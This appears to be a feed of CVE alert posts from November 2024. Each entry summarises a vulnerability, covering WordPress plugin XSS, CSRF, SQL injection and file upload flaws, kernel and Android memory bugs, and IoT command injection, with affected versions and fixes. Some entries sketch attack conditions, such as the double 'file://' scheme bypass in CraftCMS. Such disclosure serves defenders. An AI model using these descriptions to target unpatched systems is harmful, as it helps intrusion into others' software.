| 2024-11-22 16:39:21 |
🚨 CVE-2024-23293This issue was addressed through improved state management. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. An attacker with physical access may be able to use Siri to access sensitive user data.🎖@cveNotify |
|
| 2024-11-22 10:38:34 |
🚨 CVE-2017-9711Certain unprivileged processes are able to perform IOCTL calls.🎖@cveNotify |
|
| 2024-11-22 06:38:18 |
🚨 CVE-2024-9422The GEO my WP WordPress plugin before 4.5, gmw-premium-settings WordPress plugin before 3.1 does not sufficiently validate files to be uploaded, which could allow attackers to upload arbitrary files such as PHP on the server.🎖@cveNotify |
|
| 2024-11-22 06:38:17 |
🚨 CVE-2024-11601The Sky Addons for Elementor (Free Templates Library, Live Copy, Animations, Post Grid, Post Carousel, Particles, Sliders, Chart, Blog, Video Gallery) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.1. This is due to missing or incorrect nonce validation on the save_options() function. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Please note this is limited to option values that can be saved as arrays.🎖@cveNotify |
|
| 2024-11-22 06:38:16 |
🚨 CVE-2024-11381The Control horas plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ch_registro' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-11-22 06:38:12 |
🚨 CVE-2024-11225The Premium Packages – Sell Digital Products Securely plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.9.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-11-22 06:38:11 |
🚨 CVE-2024-10034The Gallery Blocks with Lightbox. Image Gallery, (HTML5 video , YouTube, Vimeo) Video Gallery and Lightbox for native gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the gallery link text parameter in all versions up to, and including, 3.2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-11-22 02:40:12 |
🚨 CVE-2024-47142AIPHONE IXG SYSTEM IXG-2C7 firmware Ver.2.03 and earlier and IXG-2C7-L firmware Ver.2.03 and earlier contain an issue with insufficiently protected credentials, which may allow a network-adjacent authenticated attacker to perform unintended operations.🎖@cveNotify |
|
| 2024-11-22 02:40:11 |
🚨 CVE-2024-31408OS command injection vulnerability exists in AIPHONE IX SYSTEM and IXG SYSTEM. A network-adjacent authenticated attacker may execute an arbitrary OS command with root privileges by sending a specially crafted request.🎖@cveNotify |
|
| 2024-11-22 02:08:35 |
🚨 CVE-2024-21287Vulnerability in the Oracle Agile PLM Framework product of Oracle Supply Chain (component: Software Development Kit, Process Extension). The supported version that is affected is 9.3.6. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Agile PLM Framework. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Agile PLM Framework accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).🎖@cveNotify |
|
| 2024-11-22 02:08:34 |
🚨 CVE-2024-38812The vCenter Server contains a heap-overflow vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution.🎖@cveNotify |
|
| 2024-11-21 20:40:20 |
🚨 CVE-2024-25977The application does not change the session token when using the login or logout functionality. An attacker can set a session token in the victim's browser (e.g. via XSS) and prompt the victim to log in (e.g. via a redirect to the login page). This results in the victim's account being taken over.🎖@cveNotify |
|
| 2024-11-21 20:40:13 |
🚨 CVE-2023-46839PCI devices can make use of a functionality called phantom functions,that when enabled allows the device to generate requests using the IDsof functions that are otherwise unpopulated. This allows a device toextend the number of outstanding requests.Such phantom functions need an IOMMU context setup, but failure tosetup the context is not fatal when the device is assigned. Notfailing device assignment when such failure happens can lead to theprimary device being assigned to a guest, while some of the phantomfunctions are assigned to a different domain.🎖@cveNotify |
|
| 2024-11-21 20:40:12 |
🚨 CVE-2023-52377Vulnerability of input data not being verified in the cellular data module.Successful exploitation of this vulnerability may cause out-of-bounds access.🎖@cveNotify |
|
| 2024-11-21 10:10:02 |
None |
|
| 2024-11-20 21:07:25 |
🚨 CVE-2024-46812In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: Skip inactive planes within ModeSupportAndSystemConfiguration[Why]Coverity reports Memory - illegal accesses.[How]Skip inactive planes.🎖@cveNotify |
|
| 2024-11-20 21:07:24 |
🚨 CVE-2024-46794In the Linux kernel, the following vulnerability has been resolved:x86/tdx: Fix data leak in mmio_read()The mmio_read() function makes a TDVMCALL to retrieve MMIO data for anaddress from the VMM.Sean noticed that mmio_read() unintentionally exposes the value of aninitialized variable (val) on the stack to the VMM.This variable is only needed as an output value. It did not need to bepassed to the VMM in the first place.Do not send the original value of *val to the VMM.[ dhansen: clarify what 'val' is used for. ]🎖@cveNotify |
|
| 2024-11-20 20:37:32 |
🚨 CVE-2018-9409In HWCSession::SetColorModeById of hwc_session.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-11-20 20:37:26 |
🚨 CVE-2018-9371In the Mediatek Preloader, there are out of bounds reads and writes due to an exposed interface that allows arbitrary peripheral memory mapping with insufficient blacklisting/whitelisting. This could lead to local elevation of privilege, given physical access to the device with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-11-20 20:37:25 |
🚨 CVE-2024-33014Transient DOS while parsing ESP IE from beacon/probe response frame.🎖@cveNotify |
|
| 2024-11-20 20:07:31 |
🚨 CVE-2024-33025Transient DOS while parsing the BSS parameter change count or MLD capabilities fields of the ML IE.🎖@cveNotify |
|
| 2024-11-20 20:07:26 |
🚨 CVE-2024-33018Transient DOS while parsing the received TID-to-link mapping element of the TID-to-link mapping action frame.🎖@cveNotify |
|
| 2024-11-20 20:07:25 |
🚨 CVE-2023-27742IDURAR ERP/CRM v1 was discovered to contain a SQL injection vulnerability via the component /api/login.🎖@cveNotify |
|
| 2024-11-20 19:37:39 |
🚨 CVE-2018-9471In the deserialization constructor of NanoAppFilter.java, there is a possible loss of data due to type confusion. This could lead to local escalation of privilege in the system server with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-11-20 19:37:32 |
🚨 CVE-2018-9470In bff_Scanner_addOutPos of Scanner.c, there is a possible out-of-bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege in an unprivileged app with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-11-20 19:37:31 |
🚨 CVE-2024-52714Tenda AC6 v2.0 v15.03.06.50 was discovered to contain a buffer overflow in the function 'fromSetSysTime.🎖@cveNotify |
|
| 2024-11-20 19:37:30 |
🚨 CVE-2024-33023Memory corruption while creating a fence to wait on timeline events, and simultaneously signal timeline events.🎖@cveNotify |
|
| 2024-11-20 19:37:26 |
🚨 CVE-2024-33021Memory corruption while processing IOCTL call to set metainfo.🎖@cveNotify |
|
| 2024-11-20 19:37:25 |
🚨 CVE-2024-24051Improper input validation of printing files in Monoprice Select Mini V2 V37.115.32 allows attackers to instruct the device's movable parts to destinations that exceed the devices' maximum coordinates via the printing of a malicious .gcode file.🎖@cveNotify |
|
| 2024-11-20 19:07:24 |
🚨 CVE-2024-4705The Testimonials Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's testimonials shortcode in all versions up to, and including, 4.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-11-20 18:07:26 |
🚨 CVE-2024-46817In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: Stop amdgpu_dm initialize when stream nums greater than 6[Why]Coverity reports OVERRUN warning. Should abort amdgpu_dminitialize.[How]Return failure to amdgpu_dm_init.🎖@cveNotify |
|
| 2024-11-20 18:07:25 |
🚨 CVE-2024-46777In the Linux kernel, the following vulnerability has been resolved:udf: Avoid excessive partition lengthsAvoid mounting filesystems where the partition would overflow the32-bits used for block number. Also refuse to mount filesystems wherethe partition length is so large we cannot safely index bits in ablock bitmap.🎖@cveNotify |
|
| 2024-11-20 18:07:24 |
🚨 CVE-2024-46776In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: Run DC_LOG_DC after checking link->link_enc[WHAT]The DC_LOG_DC should be run after link->link_enc is checked, not before.This fixes 1 REVERSE_INULL issue reported by Coverity.🎖@cveNotify |
|
| 2024-11-20 17:07:48 |
🚨 CVE-2024-20530A vulnerability in the web-based management interface of Cisco ISE could allow an unauthenticated, remote attacker to conduct an XSS attack against a user of the interface.This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.🎖@cveNotify |
|
| 2024-11-20 17:07:47 |
🚨 CVE-2024-7193A vulnerability has been found in Mp3tag up to 3.26d and classified as problematic. This vulnerability affects unknown code in the library tak_deco_lib.dll of the component DLL Handler. The manipulation leads to uncontrolled search path. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. Upgrading to version 3.26e is able to address this issue. It is recommended to upgrade the affected component. VDB-272614 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early, responded in a very professional manner and immediately released a fixed version of the affected product.🎖@cveNotify |
|
| 2024-11-20 16:38:05 |
🚨 CVE-2023-32203Horner Automation Cscape lacks proper validation of user-supplied data when parsing project files (e.g., HMI). This could lead to an out-of-bounds write at CScape_EnvisionRV+0x2e374b. An attacker could leverage this vulnerability to execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-11-20 16:38:04 |
🚨 CVE-2023-32539Horner Automation Cscape lacks proper validation of user-supplied data when parsing project files (e.g., HMI). This could lead to an out-of-bounds write at CScape_EnvisionRV+0x2e3c04. An attacker could leverage this vulnerability to potentially execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-11-20 15:37:25 |
🚨 CVE-2022-48646In the Linux kernel, the following vulnerability has been resolved:sfc/siena: fix null pointer dereference in efx_hard_start_xmitLike in previous patch for sfc, prevent potential (but unlikely) NULLpointer dereference.🎖@cveNotify |
|
| 2024-11-20 15:08:28 |
🚨 CVE-2024-50352LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the "Services" section of the Device Overview page allows authenticated users to inject arbitrary JavaScript through the "name" parameter when adding a service to a device. This vulnerability could result in the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and enabling unauthorized actions. This vulnerability is fixed in 24.10.0.🎖@cveNotify |
|
| 2024-11-20 15:08:21 |
🚨 CVE-2024-49764LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the "Capture Debug Information" page allows authenticated users to inject arbitrary JavaScript through the "hostname" parameter when creating a new device. This vulnerability results in the execution of malicious code when the "Capture Debug Information" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain. This vulnerability is fixed in 24.10.0.🎖@cveNotify |
|
| 2024-11-20 15:08:20 |
🚨 CVE-2024-49754LibreNMS is an open-source, PHP/MySQL/SNMP-based network monitoring system. A Stored Cross-Site Scripting (XSS) vulnerability in the API-Access page allows authenticated users to inject arbitrary JavaScript through the "token" parameter when creating a new API token. This vulnerability can result in the execution of malicious code in the context of other users' sessions, compromising their accounts and enabling unauthorized actions. This vulnerability is fixed in 24.10.0.🎖@cveNotify |
|
| 2024-11-20 15:08:16 |
🚨 CVE-2024-9356The Yotpo: Product & Photo Reviews for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'yotpo_user_email' and 'yotpo_user_name' parameters in all versions up to, and including, 1.7.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-11-20 15:08:15 |
🚨 CVE-2024-10924The Really Simple Security (Free, Pro, and Pro Multisite) plugins for WordPress are vulnerable to authentication bypass in versions 9.0.0 to 9.1.1.1. This is due to improper user check error handling in the two-factor REST API actions with the 'check_login_and_get_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default).🎖@cveNotify |
|
| 2024-11-20 15:08:14 |
🚨 CVE-2024-33028Memory corruption as fence object may still be accessed in timeline destruct after isync fence is released.🎖@cveNotify |
|
| 2024-11-20 15:08:10 |
🚨 CVE-2023-33184Nextcloud Mail is a mail app in Nextcloud. A blind SSRF attack allowed to send GET requests to services running in the same web server. It is recommended that the Mail app is update to version 3.02, 2.2.5 or 1.15.3.🎖@cveNotify |
|
| 2024-11-20 15:08:09 |
🚨 CVE-2020-8156A missing verification of the TLS host in Nextcloud Mail 1.1.3 allowed a man in the middle attack.🎖@cveNotify |
|
| 2024-11-20 14:07:45 |
🚨 CVE-2024-46823In the Linux kernel, the following vulnerability has been resolved:kunit/overflow: Fix UB in overflow_allocation_testThe 'device_name' array doesn't exist out of the'overflow_allocation_test' function scope. However, it is being used asa driver name when calling 'kunit_driver_create' from'kunit_device_register'. It produces the kernel panic with KASANenabled.Since this variable is used in one place only, remove it and pass thedevice name into kunit_device_register directly as an ascii string.🎖@cveNotify |
|
| 2024-11-20 14:07:44 |
🚨 CVE-2024-33034Memory corruption can occur if VBOs hold outdated or invalid GPU SMMU mappings, especially when the binding and reclaiming of memory buffers are performed at the same time.🎖@cveNotify |
|
| 2024-11-20 13:07:29 |
🚨 CVE-2020-11727A cross-site scripting (XSS) vulnerability in the AlgolPlus Advanced Order Export For WooCommerce plugin 3.1.3 for WordPress allows remote attackers to inject arbitrary web script or HTML via the view/settings-form.php woe_post_type parameter.🎖@cveNotify |
|
| 2024-11-20 13:07:28 |
🚨 CVE-2018-11525The plugin "Advanced Order Export For WooCommerce" for WordPress (v1.5.4 and before) is vulnerable to CSV Injection.🎖@cveNotify |
|
| 2024-11-20 12:37:32 |
🚨 CVE-2024-52439Deserialization of Untrusted Data vulnerability in Mark O’Donnell Team Rosters allows Object Injection.This issue affects Team Rosters: from n/a through 4.6.🎖@cveNotify |
|
| 2024-11-20 12:37:26 |
🚨 CVE-2024-52438Missing Authentication for Critical Function vulnerability in deco.Agency de:branding allows Privilege Escalation.This issue affects de:branding: from n/a through 1.0.2.🎖@cveNotify |
|
| 2024-11-20 12:37:25 |
🚨 CVE-2024-11404Unrestricted Upload of File with Dangerous Type, Improper Input Validation, Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in django CMS Association django Filer allows Input Data Manipulation, Stored XSS.This issue affects django Filer: from 3 before 3.3.🎖@cveNotify |
|
| 2024-11-20 12:37:24 |
🚨 CVE-2024-10520The WP Project Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check in the 'check' method of the 'Create_Milestone', 'Create_Task_List', 'Create_Task', and 'Delete_Task' classes in version 2.6.14. This makes it possible for unauthenticated attackers to create milestones, create task lists, create tasks, or delete tasks in any project. NOTE: Version 2.6.14 implemented a partial fix for this vulnerability.🎖@cveNotify |
|
| 2024-11-20 11:37:32 |
🚨 CVE-2024-48899A vulnerability was found in Moodle. Additional checks are required to ensure users can only fetch the list of course badges for courses that they are intended to have access to.🎖@cveNotify |
|
| 2024-11-20 11:37:26 |
🚨 CVE-2024-45691A flaw was found in Moodle. When restricting access to a lesson activity with a password, certain passwords could be bypassed or less secure due to a loose comparison in the password-checking logic. This issue only affected passwords set to "magic hash" values.🎖@cveNotify |
|
| 2024-11-20 11:37:25 |
🚨 CVE-2024-10872The Getwid – Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `template-post-custom-field` block in all versions up to, and including, 2.0.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-11-20 11:37:24 |
🚨 CVE-2024-10382There exists a code execution vulnerability in the Car App Android Jetpack Library. In the CarAppService desrialization logic is used that allows for arbitrary java classes to be constructed. In combination with other gadgets, this can lead to arbitrary code execution. An attacker needs to have an app on a victims Android device that uses the CarAppService Class and the victim would need to install a malicious app alongside it. We recommend upgrading the library past version 1.7.0-beta02🎖@cveNotify |
|
| 2024-11-20 10:37:32 |
🚨 CVE-2024-11179The MStore API – Create Native Android & iOS Apps On The Cloud plugin for WordPress is vulnerable to SQL Injection via the 'status_type' parameter in all versions up to, and including, 4.15.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-11-20 10:37:31 |
🚨 CVE-2024-10665The Yaad Sarig Payment Gateway For WC plugin for WordPress is vulnerable to unauthorized modification & access of data due to a missing capability check on the yaadpay_view_log_callback() and yaadpay_delete_log_callback() functions in all versions up to, and including, 2.2.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view and delete logs.🎖@cveNotify |
|
| 2024-11-20 09:37:25 |
🚨 CVE-2024-10127Authentication bypass condition in LDAP authentication in M-Files server versions before 24.11 supported usage of OpenLDAP configurations that allowed user authentication without a password when the LDAP server itself had the vulnerable configuration.🎖@cveNotify |
|
| 2024-11-20 09:37:24 |
🚨 CVE-2024-10126Local File Inclusion vulnerability in M-Files Server in versions before 24.11 (excluding 24.8 SR1, 24.2 SR3 and 23.8 SR7) allows an authenticated user to read server local files of a limited set of filetypes via document preview.🎖@cveNotify |
|
| 2024-11-20 08:37:28 |
🚨 CVE-2024-52033Exposure of sensitive system information to an unauthorized control sphere issue exists in Rakuten Turbo 5G firmware version V1.3.18 and earlier. If this vulnerability is exploited, a remote unauthenticated attacker may obtain information of the other devices connected through the Wi-Fi.🎖@cveNotify |
|
| 2024-11-20 08:37:27 |
🚨 CVE-2024-11319Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in django CMS Association django-cms allows Cross-Site Scripting (XSS).This issue affects django-cms: 3.11.7, 3.11.8, 4.1.2, 4.1.3.🎖@cveNotify |
|
| 2024-11-20 07:37:32 |
🚨 CVE-2024-8726The MailChimp Forms by MailMunch plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.2.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-11-20 07:37:25 |
🚨 CVE-2024-10855The Image Optimizer, Resizer and CDN – Sirv plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to insufficient validation on the filename parameter of the sirv_upload_file_by_chunks() function and lack of in all versions up to, and including, 7.3.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary option values on the WordPress site. This can be leveraged to delete an option that would create an error on the site and deny service to legitimate users.🎖@cveNotify |
|
| 2024-11-20 07:37:24 |
🚨 CVE-2024-10365The The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.0.3 via the render function in modules/widgets/tp_carousel_anything.php, modules/widgets/tp_page_scroll.php, and other widgets. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.🎖@cveNotify |
|
| 2024-11-20 06:37:25 |
🚨 CVE-2024-52614Use of hard-coded cryptographic key issue exists in "Kura Sushi Official App Produced by EPARK" for Android versions prior to 3.8.5. If this vulnerability is exploited, a local attacker may obtain the login ID and password for the affected product.🎖@cveNotify |
|
| 2024-11-20 06:37:24 |
🚨 CVE-2024-10515In the process of testing the SEO Plugin by Squirrly SEO WordPress plugin before 12.3.21, a vulnerability was found that allows you to implement Stored XSS on behalf of the editor by embedding malicious script, which entails account takeover backdoor🎖@cveNotify |
|
| 2024-11-20 05:37:24 |
🚨 CVE-2024-11278The GD bbPress Attachments plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.7.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-11-20 01:37:24 |
🚨 CVE-2024-8403Improper Validation of Specified Type of Input vulnerability in Mitsubishi Electric Corporation MELSEC iQ-F Series FX5-ENET versions 1.100 and later and FX5-ENET/IP versions 1.100 to 1.104 allows a remote attacker to cause a Denial of Service condition in Ethernet communication of the products by sending specially crafted SLMP packets.🎖@cveNotify |
|
| 2024-11-20 00:37:25 |
🚨 CVE-2024-44306A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.6. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-11-20 00:37:24 |
🚨 CVE-2018-9467In the getHost() function of UriTest.java, there is the possibility of incorrect web origin determination. This could lead to incorrect security decisions with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-11-19 23:37:25 |
🚨 CVE-2018-9440In parse of M3UParser.cpp there is a possible resource exhaustion due to improper input validation. This could lead to denial of service with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-11-19 23:37:24 |
🚨 CVE-2023-52728Open Networking Foundation SD-RAN ONOS onos-lib-go 0.10.25 allows an index out-of-range condition in putBitString.🎖@cveNotify |
|
| 2024-11-19 22:37:25 |
🚨 CVE-2023-52374Permission control vulnerability in the package management module.Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-11-19 22:37:24 |
🚨 CVE-2024-25941The jail(2) system call has not limited a visiblity of allocated TTYs (the kern.ttys sysctl). This gives rise to an information leak about processes outside the current jail.Attacker can get information about TTYs allocated on the host or in other jails. Effectively, the information printed by "pstat -t" may be leaked.🎖@cveNotify |
|
| 2024-11-19 22:07:26 |
🚨 CVE-2024-39726IBM Engineering Lifecycle Optimization - Engineering Insights 7.0.2 and 7.0.3 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources.🎖@cveNotify |
|
| 2024-11-19 22:07:25 |
🚨 CVE-2024-11247A vulnerability has been found in SourceCodester Online Eyewear Shop 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /oews/classes/Master.php?f=save_product of the component Inventory Page. The manipulation of the argument brand leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.🎖@cveNotify |
|
| 2024-11-19 21:37:32 |
🚨 CVE-2024-46613WeeChat before 4.4.2 has an integer overflow and resultant buffer overflow at core/core-string.c when there are more than two billion items in a list. This affects string_free_split_shared , string_free_split, string_free_split_command, and string_free_split_tags.🎖@cveNotify |
|
| 2024-11-19 21:37:26 |
🚨 CVE-2024-27532wasm-micro-runtime (aka WebAssembly Micro Runtime or WAMR) 06df58f is vulnerable to NULL Pointer Dereference in function `block_type_get_result_types.🎖@cveNotify |
|
| 2024-11-19 21:37:25 |
🚨 CVE-2024-21058Vulnerability in the Unified Audit component of Oracle Database Server. Supported versions that are affected are 19.3-19.22 and 21.3-21.13. Easily exploitable vulnerability allows high privileged attacker having SYSDBA privilege with network access via Oracle Net to compromise Unified Audit. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Unified Audit accessible data. CVSS 3.1 Base Score 4.9 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N).🎖@cveNotify |
|
| 2024-11-19 21:37:24 |
🚨 CVE-2024-25170An issue in Mezzanine v6.0.0 allows attackers to bypass access controls via manipulating the Host header.🎖@cveNotify |
|
| 2024-11-19 21:07:33 |
🚨 CVE-2024-43452Windows Registry Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-11-19 21:07:26 |
🚨 CVE-2024-43449Windows USB Video Class System Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-11-19 21:07:25 |
🚨 CVE-2024-38264Microsoft Virtual Hard Disk (VHDX) Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-11-19 21:07:24 |
🚨 CVE-1999-0965Race condition in xterm allows local users to modify arbitrary files via the logging option.🎖@cveNotify |
|
| 2024-11-19 20:07:26 |
🚨 CVE-2024-41167Improper input validation in UEFI firmware in some Intel(R) Server Board M10JNP2SB Family may allow a privileged user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-11-19 20:07:25 |
🚨 CVE-2024-43498.NET and Visual Studio Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-11-19 19:37:32 |
🚨 CVE-2024-11209A vulnerability was found in Apereo CAS 6.6. It has been classified as critical. This affects an unknown part of the file /login?service of the component 2FA. The manipulation leads to improper authentication. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-11-19 19:37:25 |
🚨 CVE-2023-45922glx_pbuffer.c in Mesa 23.0.4 was discovered to contain a segmentation violation when calling __glXGetDrawableAttribute(). NOTE: this is disputed because there are no common situations in which users require uninterrupted operation with an attacker-controller server.🎖@cveNotify |
|
| 2024-11-19 19:37:24 |
🚨 CVE-2024-20038In pq, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08495932; Issue ID: ALPS08495932.🎖@cveNotify |
|
| 2024-11-19 19:07:38 |
🚨 CVE-2024-11238A vulnerability, which was classified as critical, was found in Landray EKP up to 16.0. This affects the function delPreviewFile of the file /sys/ui/sys_ui_component/sysUiComponent.do?method=delPreviewFile. The manipulation of the argument directoryPath leads to path traversal. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-11-19 19:07:37 |
🚨 CVE-2024-11237A vulnerability, which was classified as critical, has been found in TP-Link VN020 F3v(T) TT_V6.2.1021. Affected by this issue is some unknown functionality of the component DHCP DISCOVER Packet Parser. The manipulation of the argument hostname leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-11-19 19:07:33 |
🚨 CVE-2024-1097A stored cross-site scripting (XSS) vulnerability exists in craigk5n/webcalendar version 1.3.0. The vulnerability occurs in the 'Report Name' input field while creating a new report. An attacker can inject malicious scripts, which are then executed in the context of other users who view the report, potentially leading to the theft of user accounts and cookies.🎖@cveNotify |
|
| 2024-11-19 19:07:32 |
🚨 CVE-2024-48993SQL Server Native Client Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-11-19 18:37:28 |
🚨 CVE-2023-29381An issue in Zimbra Collaboration (ZCS) v.8.8.15 and v.9.0 allows a remote attacker to escalate privileges and obtain sensitive information via the password and 2FA parameters.🎖@cveNotify |
|
| 2024-11-19 18:07:32 |
🚨 CVE-2024-42383Use of Out-of-range Pointer Offset vulnerability in Cesanta Mongoose Web Server v7.14 allows to write a NULL byte value beyond the memory space dedicated for the hostname field.🎖@cveNotify |
|
| 2024-11-19 18:07:26 |
🚨 CVE-2024-52291Craft is a content management system (CMS). A vulnerability in CraftCMS allows an attacker to bypass local file system validation by utilizing a double file:// scheme (e.g., file://file:////). This enables the attacker to specify sensitive folders as the file system, leading to potential file overwriting through malicious uploads, unauthorized access to sensitive files, and, under certain conditions, remote code execution (RCE) via Server-Side Template Injection (SSTI) payloads. Note that this will only work if you have an authenticated administrator account with allowAdminChanges enabled. This is fixed in 5.4.6 and 4.12.5.🎖@cveNotify |
|
| 2024-11-19 18:07:25 |
🚨 CVE-2024-10828The Advanced Order Export For WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.5.5 via deserialization of untrusted input during Order export when the "Try to convert serialized values" option is enabled. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).🎖@cveNotify |
|
| 2024-11-19 18:07:24 |
🚨 CVE-2024-10820The WooCommerce Upload Files plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the upload_files() function in all versions up to, and including, 84.3. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.🎖@cveNotify |
|
| 2024-11-19 17:37:27 |
🚨 CVE-2016-10146Multiple memory leaks in the caption and label handling code in ImageMagick allow remote attackers to cause a denial of service (memory consumption) via unspecified vectors.🎖@cveNotify |
|
| 2024-11-19 17:07:34 |
